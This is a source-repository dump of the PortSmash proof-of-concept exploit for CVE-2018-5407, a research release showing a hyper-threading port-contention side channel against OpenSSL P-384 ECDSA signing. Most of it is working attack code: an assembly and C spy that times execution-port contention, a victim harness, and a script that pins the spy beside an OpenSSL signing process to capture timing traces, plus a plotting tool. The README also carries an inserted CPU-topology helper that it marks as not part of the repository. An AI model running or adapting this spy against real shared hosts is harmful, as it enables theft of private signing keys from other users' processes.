├── .gitattributes
├── .gitignore
├── LICENSE
├── Makefile
├── NOTICE
├── README.md
├── ecc.c
├── freq.sh
├── parse_raw_simple.png
├── parse_raw_simple.py
├── spy.S
├── spy.c
├── spy.h
└── sync.sh

/.gitattributes:
--------------------------------------------------------------------------------
**/*.png filter=lfs diff=lfs merge=lfs -text
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
*.bin
*.pem
*.sig
ecc
spy
pipe.fifo
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------

                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/

   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION

   1. Definitions.

      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.

      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.

      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.

      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.

      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.

      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.

      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).

      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.

      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner.
      For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."

      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by Licensor and
      subsequently incorporated within the Work.

   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.

   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted.
      If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.

   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:

      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and

      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and

      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and

      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding those notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License.
          You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.

      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.

   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.

   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.

   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE.
      You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.

   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.

   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.

   END OF TERMS AND CONDITIONS

   APPENDIX: How to apply the Apache License to your work.

      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information.
      (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. We also recommend that a
      file or class name and description of purpose be included on the
      same "printed page" as the copyright notice for easier
      identification within third-party archives.

   Copyright [yyyy] [name of copyright owner]

   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at

       http://www.apache.org/licenses/LICENSE-2.0

   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
CFLAGS += -g -Wall
OPENSSL_ROOT_DIR=/usr/local/ssl

all: spy ecc

spy: spy.c spy.S
	$(CC) -o $@ $^ $(CFLAGS)

ecc: ecc.c
	$(CC) -o $@ $< $(CFLAGS) -lcrypto -I$(OPENSSL_ROOT_DIR)/include -L$(OPENSSL_ROOT_DIR)/lib -Wl,-rpath=$(OPENSSL_ROOT_DIR)/lib

clean:
	rm -f spy ecc *~ *.pyc

deepclean: clean
	rm -f timings.bin data.bin data.sig secp384r1.pem

.PHONY: clean deepclean
--------------------------------------------------------------------------------
/NOTICE:
--------------------------------------------------------------------------------
PortSmash Proof-of-Concept exploit
Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri

This product includes software developed at
Tampere University (formerly
Tampere University of Technology) to demonstrate the PortSmash
side-channel technique (CVE-2018-5407) described in
https://ia.cr/2018/1060 .
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Summary

This is a proof-of-concept exploit of the PortSmash microarchitecture attack, tracked by [CVE-2018-5407](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5407).

More technical details about the PortSmash side-channel are available in [this manuscript](https://eprint.iacr.org/2018/1060).

![Alt text](parse_raw_simple.png?raw=true "sample PortSmash visualization tooling")

# License

This software is licensed under the terms of the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0).

Check [LICENSE](LICENSE) and [NOTICE](NOTICE) for more details.

# Setup

## Prerequisites

A CPU featuring SMT (e.g. Hyper-Threading) is the only requirement.

This exploit code should work out of the box on Skylake and Kaby Lake. For other SMT architectures, customizing the strategies and/or waiting times in `spy` is likely needed.

## OpenSSL

Download and install OpenSSL 1.1.0h or lower:

    cd /usr/local/src
    wget https://www.openssl.org/source/openssl-1.1.0h.tar.gz
    tar xzf openssl-1.1.0h.tar.gz
    cd openssl-1.1.0h/
    export OPENSSL_ROOT_DIR=/usr/local/ssl
    ./config -d shared --prefix=$OPENSSL_ROOT_DIR --openssldir=$OPENSSL_ROOT_DIR -Wl,-rpath=$OPENSSL_ROOT_DIR/lib
    make -j8
    make test
    sudo checkinstall --strip=no --stripso=no --pkgname=openssl-1.1.0h-debug --provides=openssl-1.1.0h-debug --default make install_sw

If you use a different path, you'll need to make changes to `Makefile` and `sync.sh`.

# Tooling

## freq.sh

Turns off frequency scaling and TurboBoost.

## sync.sh

Sync trace through pipes. It has two victims, one of which should be active at a time:

1. The stock `openssl` running `dgst` command to produce a P-384 signature.
2. A harness `ecc` that calls scalar multiplication directly with a known key. (Useful for profiling.)

The script will generate a P-384 key pair in `secp384r1.pem` if it does not already exist.

The script outputs `data.bin` which is what `openssl dgst` signed, and you should be able to verify the ECDSA signature `data.sig` afterwards with

    openssl dgst -sha512 -verify secp384r1.pem -signature data.sig data.bin

In the `ecc` tool case, `data.bin` and `secp384r1.pem` are meaningless and `data.sig` is not created.

For the `taskset` commands in `sync.sh`, the cores need to be two logical cores of the same physical core; sanity check with

    $ grep '^processor\|^core id' /proc/cpuinfo
    processor : 0
    core id : 0
    processor : 1
    core id : 1
    processor : 2
    core id : 2
    processor : 3
    core id : 3
    processor : 4
    core id : 0
    processor : 5
    core id : 1
    processor : 6
    core id : 2
    processor : 7
    core id : 3

So the script is currently configured for logical cores 3 and 7 (`processor`) that both map to physical core 3 (`core_id`).

## spy

Measurement process that outputs measurements in `timings.bin`. To change the `spy` strategy, check the port defines in `spy.h`. Only one strategy should be active at build time.

Note that `timings.bin` is actually raw clock cycle counter values, not latencies. Look in `parse_raw_simple.py` to understand the data format if necessary.

## ecc

Victim harness for running OpenSSL scalar multiplication with known inputs.
Example:

    ./ecc M 4 deadbeef0123456789abcdef00000000c0ff33

Will execute 4 consecutive calls to `EC_POINT_mul` with the given hex scalar.

## parse_raw_simple.py

Quick and dirty hack to view 1D traces. The top plot is the raw trace. Everything below is a different digital filter of the raw trace for viewing purposes. Zoom and pan are your friends here.

You might have to adjust the `CEIL` variable if the plots are too aggressively clipped.

Python packages:

    sudo apt-get install python-numpy python-matplotlib python-scipy

Optional but recommended to view peaks:

    sudo pip install --upgrade scipy

# Usage

Turn off frequency scaling:

    ./freq.sh

Make sure everything builds:

    make clean
    make

Take a measurement:

    ./sync.sh

View the trace:

    python parse_raw_simple.py timings.bin

You can play around with one victim at a time in `sync.sh`. Sample output for the `openssl dgst` victim is in `parse_raw_simple.png`.

# Credits

## Authors

* Alejandro Cabrera Aldaya (Universidad Tecnológica de la Habana (CUJAE), Habana, Cuba)
* Billy Bob Brumley (Tampere University, Tampere, Finland)
* Sohaib ul Hassan (Tampere University, Tampere, Finland)
* Cesar Pereida García (Tampere University, Tampere, Finland)
* Nicola Tuveri (Tampere University, Tampere, Finland)

## Funding

This project has received funding from the European Research Council (ERC) under the European Union's Horizon 2020 research and innovation programme (grant agreement No 804476).
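
The logical-to-physical core check from the `sync.sh` section, as an added example that is not part of the PortSmash repository: it groups logical CPUs by physical core from `/proc/cpuinfo`-style text and, going beyond the `grep` shown there, also keys on `physical id`, because `core id` values repeat across sockets. The function names and both sample listings are constructed for illustration.

```python
# Added example, not part of the PortSmash repository.
import os
from collections import defaultdict

FIELDS = ("processor", "physical id", "core id")

# Constructed sample: one socket, four cores, SMT on (same layout as the README listing).
SINGLE_SOCKET = "\n\n".join(
    "processor\t: %d\nphysical id\t: 0\ncore id\t\t: %d" % (cpu, cpu % 4)
    for cpu in range(8)
)

# Constructed sample: two sockets, one core each, SMT on. Every stanza reports
# "core id : 0", so core id alone cannot tell the sockets apart.
DUAL_SOCKET = "\n\n".join(
    "processor\t: %d\nphysical id\t: %d\ncore id\t\t: 0" % (cpu, cpu % 2)
    for cpu in range(4)
)


def parse_cpuinfo(text):
    """Return {logical_cpu: (physical_id, core_id)} from cpuinfo-style text."""
    topology = {}
    stanza = {}

    def flush():
        if "processor" in stanza and "core id" in stanza:
            # Assumption: no "physical id" line (e.g. filtered grep output)
            # means a single socket, recorded as socket 0.
            topology[stanza["processor"]] = (
                stanza.get("physical id", 0),
                stanza["core id"],
            )

    for line in text.splitlines():
        key, sep, value = line.partition(":")
        key = key.strip()
        if not sep or key not in FIELDS:
            continue
        try:
            number = int(value)
        except ValueError:
            continue  # non-numeric field on an unfamiliar platform: skip it
        if key == "processor":  # a "processor" line opens a new stanza
            flush()
            stanza.clear()
        stanza[key] = number
    flush()
    return topology


def sibling_sets(topology):
    """Map (physical_id, core_id) -> sorted logical CPUs that share that core."""
    cores = defaultdict(list)
    for cpu, core in topology.items():
        cores[core].append(cpu)
    return {core: sorted(cpus) for core, cpus in cores.items()}


def smt_cores(topology):
    """Only the physical cores that expose more than one logical CPU."""
    return {c: cpus for c, cpus in sibling_sets(topology).items() if len(cpus) > 1}


def share_physical_core(topology, cpu_a, cpu_b):
    """True when two distinct logical CPUs sit on the same physical core."""
    if cpu_a == cpu_b or cpu_a not in topology or cpu_b not in topology:
        return False
    return topology[cpu_a] == topology[cpu_b]


if __name__ == "__main__":
    path = "/proc/cpuinfo"
    text = open(path).read() if os.path.exists(path) else SINGLE_SOCKET
    for (package, core), cpus in sorted(smt_cores(parse_cpuinfo(text)).items()):
        print("socket %d core %d: logical CPUs %s" % (package, core, cpus))
```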
--------------------------------------------------------------------------------
/ecc.c:
--------------------------------------------------------------------------------
/*
 * Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <openssl/bn.h>
#include <openssl/ec.h>
#include <openssl/obj_mac.h>
#include "spy.h"

int main(int argc, char * argv[]) {

    if (argc < 4 || (strcmp(argv[1], "A") && strcmp(argv[1], "D") && strcmp(argv[1], "AD") && strcmp(argv[1], "M"))) {
        printf("usage: %s /* (A)dd (D)ouble (M)ultiply */\n", argv[0]);
        return 0;
    }

    /* number of iterations */
    int its = atoi(argv[2]);
    /* create new CTX*/
    BN_CTX *ctx = BN_CTX_new();
    assert(ctx != NULL);
    BN_CTX_start(ctx);

    EC_GROUP *group = EC_GROUP_new_by_curve_name(NID_secp384r1);
    //EC_GROUP *group = EC_GROUP_new_by_curve_name(NID_secp521r1);
    //EC_GROUP *group = EC_GROUP_new_by_curve_name(NID_brainpoolP512r1);
    assert(group != NULL);

    /* initialize variables */
    BIGNUM *k, *order, *x, *y;
    k = BN_CTX_get(ctx);
    order = BN_CTX_get(ctx);
    x = BN_CTX_get(ctx);
    y = BN_CTX_get(ctx);
    assert(y != NULL);

    /* initialize EC points */
    EC_POINT *Q =
        EC_POINT_new(group);
    EC_POINT *P = EC_POINT_new(group);
    assert(Q != NULL);
    assert(P != NULL);

    EC_GROUP_get_order(group, order, ctx);

    /* receive nonce from cmd, generate random nonce if not provided */
    BN_hex2bn(&k, argv[3]);

    if (BN_is_zero(k))
        BN_rand_range(k, order);

    /* compute [P]k and copy to Q */
    EC_POINT_mul(group, P, k, NULL, NULL, ctx);
    EC_POINT_make_affine(group, P, ctx);
    EC_POINT_copy(Q, P);

    /* block computation using a pipe until receive from spy -- to sync victim and spy */
    size_t ret;
    uint8_t *zeroes = (uint8_t *)calloc(ZERO_COUNT, sizeof(uint8_t));
    assert(zeroes != NULL);
    FILE *pipe;
    pipe = fopen(SPY_PIPE, "rb");
    assert(pipe != NULL);
    ret = fread(zeroes, sizeof(uint8_t), ZERO_COUNT, pipe);
    assert(ret == ZERO_COUNT);
    fclose(pipe);
    free(zeroes);

    /* perform Add and Double */
    if (!strcmp(argv[1], "AD")) {
        /* separate counters: counting `its` down in the first loop would leave none for the second */
        for (int i = 0; i < its; i++) {
            EC_POINT_add(group, Q, Q, P, ctx);
        }
        for (int i = 0; i < its; i++) {
            EC_POINT_dbl(group, Q, Q, ctx);
        }
    }
    /* perform only ADD or DOUBLE or MULTIPLY */
    else if (!strcmp(argv[1], "A")) {
        for (; its; its--) {
            EC_POINT_add(group, Q, Q, P, ctx);
        }
    }
    else if (!strcmp(argv[1], "D")) {
        for (; its; its--) {
            EC_POINT_dbl(group, Q, Q, ctx);
        }
    }
    else if (!strcmp(argv[1], "M")) {
        for (; its; its--) {
            EC_POINT_mul(group, Q, k, NULL, NULL, ctx);
        }
    }
    else {
        assert(0);
    }

    /* get x and y coordinates from Q */
    EC_POINT_get_affine_coordinates_GFp(group, Q, x, y, ctx);
    char *s0 = BN_bn2hex(k);
    char *s1 = BN_bn2hex(x);
    char *s2 = BN_bn2hex(y);
    /* print to console */
    printf(" k: 0x%s\n", s0);
    printf("Px: 0x%s\n", s1);
    printf("Py: 0x%s\n", s2);

    /* free memory */
    BN_CTX_end(ctx);
    EC_POINT_free(P);
    EC_POINT_free(Q);
    EC_GROUP_free(group);
    BN_CTX_free(ctx);

    free(s0);
    free(s1);
    free(s2);

    return 0;
}
--------------------------------------------------------------------------------
/freq.sh:
--------------------------------------------------------------------------------
#!/bin/bash

echo "1" | sudo tee /sys/devices/system/cpu/intel_pstate/no_turbo
echo "performance" | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor
--------------------------------------------------------------------------------
/parse_raw_simple.png:
--------------------------------------------------------------------------------
version https://git-lfs.github.com/spec/v1
oid sha256:bdc0f66dd99520ff6227b75e76e01f67ad2a377feb70b40b962ef9e9f219ef2a
size 323309
--------------------------------------------------------------------------------
/parse_raw_simple.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


import sys
import array
import warnings
from scipy import signal
import numpy as np
import matplotlib.pyplot as plt

# tweakable parameter: signal clipping
CEIL = 511

def normalize(x):
    if x > CEIL: x = CEIL
    if x < 0: x = CEIL
    return x

def running_mean(x, N):
    cumsum = np.cumsum(np.insert(x, 0, 0))
    return (cumsum[N:] - cumsum[:-N]) / N

try:
    fp = open(sys.argv[1], "rb")
except:
    print("Usage: python %s " % (sys.argv[0]))
    sys.exit(1)

out = fp.read()
fp.close()

timings = array.array('I')
timings.frombytes(out)

lats = []

for i in range(0,len(timings),2):
    lats.append(timings[i+1]-timings[i])

lats = list(map(normalize, lats))
ma2 = running_mean(lats, 2)
ma4 = running_mean(lats, 4)
# (9,3) are tweakable parameters
ma8 = signal.savgol_filter(lats,9,3)

params = {'fillstyle':'full','markeredgewidth':0.0,'ms':4.0}
f, axarr = plt.subplots(4, sharex=True, sharey=True)
# plot the trace
axarr[0].plot(lats,**params)
# plot the filtered traces
axarr[1].plot(ma2,**params)
axarr[2].plot(ma4,**params)
axarr[3].plot(ma8,**params)
# try to plot the peaks
try:
    # (240,90) are tweakable parameters
    PEAK_MPH = 240
    PEAK_MPD = 90
    peaks, properties = signal.find_peaks(ma4, height=PEAK_MPH, distance=PEAK_MPD)
    axarr[2].scatter(peaks, [ma4[p] for p in peaks], color='red')
    peaks, properties = signal.find_peaks(ma8, height=PEAK_MPH, distance=PEAK_MPD)
    axarr[3].scatter(peaks, [ma8[p] for p in peaks], color='red')
except:
    warnings.warn("scipy.signal.find_peaks not found: Consult README.md")

plt.get_current_fig_manager().full_screen_toggle()
plt.show()

--------------------------------------------------------------------------------
/spy.S:
--------------------------------------------------------------------------------
/*
 * Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include "spy.h"

# args : rdi (buf) rsi rdx rcx r8 r9
# scratch: rax r10 r11

.text

.global x64_portsmash_spy
.p2align 4
x64_portsmash_spy:
    # just some non-degenerate values
    add %rdi, %r8
    add %rdi, %r9
    add %rdi, %r10
    add %rdi, %r11

    mov $SPY_NUM_TIMINGS, %rcx

1:
    lfence
    rdtsc # rdx:rax
    lfence
    mov %rax, %rsi

#ifdef PORTSMASH_P0156
    .rept 64
    add %r8, %r8
    add %r9, %r9
    add %r10, %r10
    add %r11, %r11
    .endr
#elif defined(PORTSMASH_P015)
    .rept 64
    paddb %xmm0, %xmm0
    paddb %xmm1, %xmm1
    paddb %xmm2, %xmm2
    .endr
#elif defined(PORTSMASH_P06)
    .rept 256
    ror $2, %rdx
    ror $2, %rax
    .endr
#elif defined(PORTSMASH_P15)
    .rept 64
    andn %r8, %r9, %r8
    andn %r10, %r11, %r10
    .endr
#elif defined(PORTSMASH_P1)
    .rept 48
    crc32 %r8, %r8
    crc32 %r9, %r9
    crc32 %r10, %r10
    .endr
#elif defined(PORTSMASH_P5)
    .rept 48
    vpermd %ymm0, %ymm1, %ymm0
    vpermd %ymm2, %ymm3, %ymm2
    vpermd %ymm4, %ymm5, %ymm4
    .endr
#else
#error Not smashing any ports
#endif

    lfence
    rdtsc
    shl $32, %rax
    or %rsi, %rax
    mov %rax, (%rdi)
    add $8, %rdi
    dec %rcx
    jnz 1b

    ret
--------------------------------------------------------------------------------
/spy.c:
--------------------------------------------------------------------------------
/*
 * Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include "spy.h"
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>

int main(int argc, char *argv[]) {

    size_t ret;
    /* pipe */
    uint8_t *zeroes = (uint8_t *)calloc(ZERO_COUNT, sizeof(uint8_t));
    FILE *pipe;
    pipe = fopen(SPY_PIPE, "wb+");
    assert(pipe != NULL);
    ret = fwrite(zeroes, sizeof(uint8_t), ZERO_COUNT, pipe);
    assert(ret == ZERO_COUNT);

    fclose(pipe);
    free(zeroes);

    /* spy */
    /* size_t ret; */
    ret = 0;
    uint64_t *timings = (uint64_t *)calloc(SPY_NUM_TIMINGS, sizeof(uint64_t));
    assert(timings != NULL);

    /* call function in assembler */
    x64_portsmash_spy(timings);

    /* open file */
    FILE *fp;
    fp = fopen("timings.bin", "wb+");
    assert(fp != NULL);

    ret = fwrite(timings, sizeof(uint64_t), SPY_NUM_TIMINGS, fp);
    assert(ret == SPY_NUM_TIMINGS);

    fclose(fp);
    free(timings);

    return 0;
}
--------------------------------------------------------------------------------
/spy.h:
--------------------------------------------------------------------------------
/*
 * Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#ifndef SPY_H
#define SPY_H

//#define PORTSMASH_P0156
//#define PORTSMASH_P1
#define PORTSMASH_P5
//#define PORTSMASH_P015
//#define PORTSMASH_P06
//#define PORTSMASH_P15

#define SPY_NUM_TIMINGS (1<<16)
#define ZERO_COUNT (1<<10)
#define SPY_PIPE "pipe.fifo"

#ifndef __ASSEMBLER__
#include <stdint.h>
extern void x64_portsmash_spy(uint64_t *buffer);
#endif

#endif /* SPY_H */
--------------------------------------------------------------------------------
/sync.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Copyright 2018-2019 Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García and Nicola Tuveri
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


OPENSSL=/usr/local/ssl/bin/openssl
KEY_CURVE=secp384r1
KEY_FILE=$KEY_CURVE.pem

make clean
make
pkill spy
rm -f pipe.fifo

# create a P-384 key pair if it does not exist
if [ ! -f $KEY_FILE ]; then
    $OPENSSL ecparam -genkey -name $KEY_CURVE -out $KEY_FILE
    $OPENSSL ec -in $KEY_FILE -pubout >> $KEY_FILE
fi

# create pipe
mkfifo pipe.fifo

# Victims: exactly one of these should be active at runtime, so make sure exactly one is commented out.

# Victim 1: start signing but it will be blocked
taskset -c 7 $OPENSSL dgst -sha512 -sign $KEY_FILE -out data.sig pipe.fifo &

# Victim 2: start scalar multiplication but it will be blocked
#taskset -c 7 ./ecc M 4 000084210000842100008421000084210000842100008421000084210000842100008421000084210000842100008421 &

sleep 0.1

# Spy: must be on same physical core, but different logical core
# start spying and generate the message to be signed
taskset -c 3 ./spy

# wait to finish the signature/spying
wait

# reproduce the message file (all zeroes)
dd if=/dev/zero of=data.bin bs=1 count=1K

# remove pipe
rm -f pipe.fifo

pkill spy

--------------------------------------------------------------------------------